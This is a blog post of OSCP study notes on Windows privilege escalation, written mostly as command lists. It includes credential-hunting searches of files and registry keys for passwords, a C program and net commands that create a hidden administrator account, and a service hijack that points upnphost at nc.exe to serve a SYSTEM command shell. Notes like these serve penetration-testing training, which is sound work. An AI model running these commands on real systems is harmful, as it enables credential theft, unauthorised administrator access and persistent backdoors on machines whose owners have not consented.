OSCP Notes – Privilege Escalation (Windows)

Useful Resources


Watch you tube videos


Windows exploit suggester


python /home/nikhil/scripts/windows-exploit-suggester.py -d 2016-07-02-mssb.xls -i systeminfo -l
systeminfo file contains: ASCII output of ‘systeminfo’ command run in windows
-l : show only local exploits


Windows Administrator to System

PSEXEC.exe -i -s -d CMD


Add Admin User account

net user /add [username] [password]
net localgroup administrators [username] /add

Compile follow C code into exe to add admin user account

int main()
{ int i;

i = system(“net user /add ashoka qwerty”);

i = system(“net localgroup administrators ashoka /add”);
return 0;


Windows Priv Escalation Info gather

  • windows-privesc-check2.exe
windows-privesc-check2.exe –audit -a -o wpc-report
  • wmic_info.bat

Basic Commands

systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
echo %username%
net users
net user user1

If user is in power user group, refer https://blogs.technet.microsoft.com/markrussinovich/2006/05/01/the-power-in-power-users/

net view
net user /domain
echo %logonserver%
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start Running windows services

Search for file names

dir /s *pass* == *cred* == *vnc* == *.config*

Search within files

findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat

Search registry

reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

Search for sensitive files

dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s

When machine on domain (Group Policy Preference GPP)

Search groups.xml in SYSVOL

Metasploit module for extracting it : post/windows/gather/credentials/gpp

C:\ProgramData\Microsoft\Group Policy\History

Extracted these two paths from above exploit module

Encryption key: https://msdn.microsoft.com/en-us/library/Cc422924.aspx

Good resource on this topic : http://www.toshellandback.com/2015/08/30/gpp/

Install *.msi as SYSTEM if

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Windows Services

Info on service

sc qc

Prevents pop ups to user :

accesschk.exe /accepteula

Use accesschk 5.2 if 6.0 doesn’t work

Access permissions on specific service

accesschk.exe -ucqv

Access permissions on specific Group

accesschk.exe -uwcqv “Authenticated Users” *

Look for following permissions


Modifying vulnerable services

sc qc upnphost
sc config upnphost binpath= “C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe”
sc config upnphost obj= “.\LocalSystem” password= “”
sc qc upnphost
net start upnphost

Files/Folder Permissions

  1. Examine ALL the binpaths for the windows services, scheduled tasks and startup tasks.
  2. Look for permissions on files/folders if can be changed.
  3. Replace the binaries/DLLs if possible

Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs “Authenticated Users” c:\

Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs “Authenticated Users” c:\*.*

Find weak permissions via Cacls or ICacls

cacls “C:\Program Files” /T | findstr Users
icacls “C:\Program Files” /T | findstr Users

DLL Hijacking

If any service tries to access non-exiting DLLs. But how to identify which services will do that? This might be done, by running the same service in a test environment and using sysinternal’s procmon to see what DLLs are requested by the service. DLL Redirection could also be used. https://msdn.microsoft.com/en-us/library/windows/desktop/ms682600(v=vs.85).aspx

You can see the DLL search order on 32-bit systems below:
1 – The directory from which the application loaded No access as limited user
2 – 32-bit System directory (C:\Windows\System32) No access as limited user
3 – 16-bit System directory (C:\Windows\System) No access as limited user
4 – Windows directory (C:\Windows) No access as limited user
5 – The current working directory (CWD) NA
6 – Directories in the PATH environment variable (system then user)

Check for permissions on directories in PATH environment variable

echo %PATH%
accesschk.exe -dqv “C:\Python27”

sc qc

Generate msfvenom DLL payload

VNC Stored

reg query “HKCU\Software\ORL\WinVNC3\Password”

Windows Autologin:

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”

SNMP Parameters:

reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”

Putty clear text proxy credentials:

reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”

Password Recovery Tools


Shatter Attack

For windows NT4.0, Win2000, WinXP

Scheduled Tasks

schtasks /query /fo LIST /v

Find a task pointing to an insecure location

Orphaned Installs

Missing files in writable locations. But how to identify orphaned installs?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s